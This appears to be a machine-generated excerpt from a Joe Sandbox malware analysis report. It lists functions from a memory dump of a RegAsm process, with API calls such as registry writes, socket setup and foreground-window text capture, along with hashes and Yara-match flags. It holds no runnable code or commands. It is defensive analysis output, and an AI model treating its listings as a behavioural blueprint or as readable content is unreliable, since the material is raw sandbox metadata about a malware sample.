                                                                • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                APIs
                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                • RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID:
                                                                • API String ID: 1818849710-0
                                                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                APIs
                                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Info
                                                                • String ID:
                                                                • API String ID: 1807457897-3916222277
                                                                • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                APIs
                                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Info
                                                                • String ID:
                                                                • API String ID: 1807457897-3916222277
                                                                • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                                • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: pQG
                                                                • API String ID: 176396367-3769108836
                                                                • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                APIs
                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: String
                                                                • String ID: LCMapStringEx
                                                                • API String ID: 2568140703-3893581201
                                                                • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                APIs
                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: String
                                                                • String ID: LCMapStringEx
                                                                • API String ID: 2568140703-3893581201
                                                                • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                                • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                                APIs
                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                                Strings
                                                                • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CountCriticalInitializeSectionSpin
                                                                • String ID: InitializeCriticalSectionEx
                                                                • API String ID: 2593887523-3084827643
                                                                • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                                • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Alloc
                                                                • String ID: FlsAlloc
                                                                • API String ID: 2773662609-671089009
                                                                • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Alloc
                                                                • String ID: FlsAlloc
                                                                • API String ID: 2773662609-671089009
                                                                • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                                • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                                APIs
                                                                • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: try_get_function
                                                                • String ID: FlsAlloc
                                                                • API String ID: 2742660187-671089009
                                                                • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                                APIs
                                                                • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: try_get_function
                                                                • String ID: FlsAlloc
                                                                • API String ID: 2742660187-671089009
                                                                • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                                                • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                                                APIs
                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus
                                                                • String ID: @
                                                                • API String ID: 1890195054-2766056989
                                                                • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                APIs
                                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CodeInfoPageValid
                                                                • String ID:
                                                                • API String ID: 546120528-0
                                                                • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                APIs
                                                                  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                                • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CodeInfoPageValid
                                                                • String ID:
                                                                • API String ID: 546120528-0
                                                                • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                                • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                                                APIs
                                                                  • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                  • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                  • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                  • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                  • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                  • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                • _free.LIBCMT ref: 10006CD7
                                                                • _free.LIBCMT ref: 10006D0D
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorLast_abort
                                                                • String ID:
                                                                • API String ID: 2991157371-0
                                                                • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                                  • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                                  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                • _free.LIBCMT ref: 0044F050
                                                                • _free.LIBCMT ref: 0044F086
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorLast_abort
                                                                • String ID:
                                                                • API String ID: 2991157371-0
                                                                • Opcode ID: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                                • Opcode Fuzzy Hash: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                                APIs
                                                                • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                                • String ID:
                                                                • API String ID: 2279764990-0
                                                                • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                                • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                                APIs
                                                                • _free.LIBCMT ref: 00446227
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap$_free
                                                                • String ID:
                                                                • API String ID: 1482568997-0
                                                                • Opcode ID: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                                                                • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                                • Opcode Fuzzy Hash: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                                                                • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                                APIs
                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateEventStartupsocket
                                                                • String ID:
                                                                • API String ID: 1953588214-0
                                                                • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                APIs
                                                                • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.998024359.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000E.00000002.998019428.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.998024359.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                • String ID:
                                                                • API String ID: 3750050125-0
                                                                • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$ForegroundText
                                                                • String ID:
                                                                • API String ID: 29597999-0
                                                                • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                APIs
                                                                  • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
